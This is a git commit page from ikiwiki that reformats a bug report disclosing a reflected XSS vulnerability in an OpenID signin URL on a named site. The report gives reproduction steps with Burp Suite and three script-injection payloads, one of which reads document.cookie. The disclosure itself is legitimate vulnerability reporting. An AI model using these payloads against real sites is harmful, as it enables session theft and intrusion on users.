fix formatting

author: http://smcv.pseudorandom.co.uk/ <smcv@web> 2015-03-30 06:56:25 -0400
committer: admin <admin@branchable.com> 2015-03-30 06:56:25 -0400
commit: 7da5085589208573b16afd8a9516cffede43e18c (patch)
tree: c004d3794d20ce982590719cd7f14497d669a8ab /doc
parent: c68c044d8743d83ae5a845a2c800a3b03a7d7350 (diff)
download: ikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar
ikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar.gz
1 files changed, 5 insertions, 3 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.mdwn b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
index 436e3faae..2c147073a 100644
--- a/doc/bugs/XSS_Alert...__33____33____33__.mdwn
+++ b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
@@ -5,14 +5,16 @@ Vulnerable Links:
 webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 
 How To Reproduce The Vulnerability :
+
 1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
 3. forward the request
 
 XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
 
 NOTE : Proof of concept is attached.
author	http://smcv.pseudorandom.co.uk/ <smcv@web>	2015-03-30 06:56:25 -0400
committer	admin <admin@branchable.com>	2015-03-30 06:56:25 -0400
commit	7da5085589208573b16afd8a9516cffede43e18c (patch)
tree	c004d3794d20ce982590719cd7f14497d669a8ab /doc
parent	c68c044d8743d83ae5a845a2c800a3b03a7d7350 (diff)
download	ikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar ikiwiki-7da5085589208573b16afd8a9516cffede43e18c.tar.gz